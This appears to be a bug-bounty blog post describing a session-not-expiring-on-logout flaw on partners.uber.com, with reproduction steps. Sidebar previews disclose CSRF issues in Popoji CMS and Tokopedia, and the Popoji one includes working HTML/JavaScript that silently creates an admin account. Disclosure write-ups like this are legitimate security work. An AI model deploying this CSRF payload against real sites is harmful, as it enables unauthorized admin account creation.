Session not expired When logout [partners.uber.com]

It's funny, when i can reproduce it 4 days ago and make some video, the team said we’re unable to reproduce this issue following the steps you provided. it's i copy - paste with my report on hackerone


 


Hi,

Summary

partners.uber.com website is not expiring the user's session immediately after logout.

when user logout, the session not expired, and still can send request and the server respond response with OKAY

Steps to Reproduce:

  1. Log into the website - partners.uber.com
  2. Capture any request. For ex, profile edit page using burp proxy.
  3. Logout from the website.
  4. Replay the request captured in step 2 and notice it displays the proper response.
Thanks,

the team it's fixed this issue, and say this is was unvalidated issue.but the team won't to disclose report, finally after few roast, team agree to disclose.

i try to contact hackerone team with support, because when i want to call hackerone team to my report, there's no option on my report.

Last word : dont forget to make some video when you want to report it guys :) 

Comments

Post a Comment

Popular posts from this blog

Missing CSRF Token On Add Admin [Popoji CMS]

Image
Description: This is happen because when request add admin there's no CSRF token Step To Reproduce : <script>function getMe(){ // retrieve page content var xhr = new XMLHttpRequest(); // now execute the CSRF attack xhr.open("POST", "http://root/popoji/poadmin/ route.php?mod=user&act=addnew", true); xhr.withCredentials="true"; xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); xhr.send('username=root&nama_lengkap=test&password=Mypass1337&repeatpass=Mypass1337&email=nosashan dy21%40gmail.com&no_telp=083833232954&level=1'); } </script> <button onclick="getMe();">Let's Rock</button> 1. Save code to .html 2. upload them to host 3. execute it. Video :  https://www.youtube.com/watch?v=1FXXuSiB6jo Fix & Mitigation : give token when request sensitive action. Note: them give me permission to disclose it, and th
Read more

Tokopedia - CSRF To Create New Store For New User

Image
CSRF Issue On Tokopedia,  List of bug on Tokopedia : - http://v1nsh4n.blogspot.com/2017/05/tokopedia-csrf-to-create-new-store-for.html - http://v1nsh4n.blogspot.com/2017/05/tokopedia-csrf-on-report-item.html - http://v1nsh4n.blogspot.com/2017/05/tokopedia-csrf-on-change-picture-on.html - http://v1nsh4n.blogspot.com/2017/05/tokopedia-csrf-on-change-picture-login.html - http://v1nsh4n.blogspot.com/2017/05/tokopedia-csrf-on-open-store.html Halo, Saya menemukan sebuah bug CSRF di tokopedia Pendahuluan Bug ini untuk membuat toko baru di tokopedia, untuk user baru Vuln Request: POST /ajax/myshop.pl HTTP/1.1 Host: www.tokopedia.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Referer: https://www.tokopedia.com/myshop.pl Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length:
Read more